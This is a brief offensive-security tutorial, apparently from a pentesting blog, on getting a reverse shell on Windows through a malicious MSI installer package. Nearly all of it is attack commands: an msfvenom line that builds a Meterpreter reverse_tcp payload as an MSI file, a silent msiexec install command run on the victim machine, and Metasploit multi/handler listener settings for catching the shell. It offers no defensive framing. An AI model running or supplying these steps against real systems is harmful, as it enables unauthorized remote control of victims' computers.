Get the Reverse Shell with MSI package

Windows OS comes installed with a Windows Installer engine which is used by MSI packages for the installation of applications. The executable program that interprets packages and installs products is Msiexec.exe.

Launch msiexec attack via msfvenom

Let’s generate an MSI Package file (1.msi) utilizing the Windows Meterpreter payload as follows;

msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=1234 -f msi > 1.msi

At the target end, when the victim execute the 1.msi file on the remote machine with the following utiliy;

msiexec /q /i

The attacker get the reverse shell of the victim machine by starting multi/handler as the listener.

  • use exploit/multi/handler
  • set pyaload windows/meterpreter/reverse_tcp
  • set lhost
  • exploit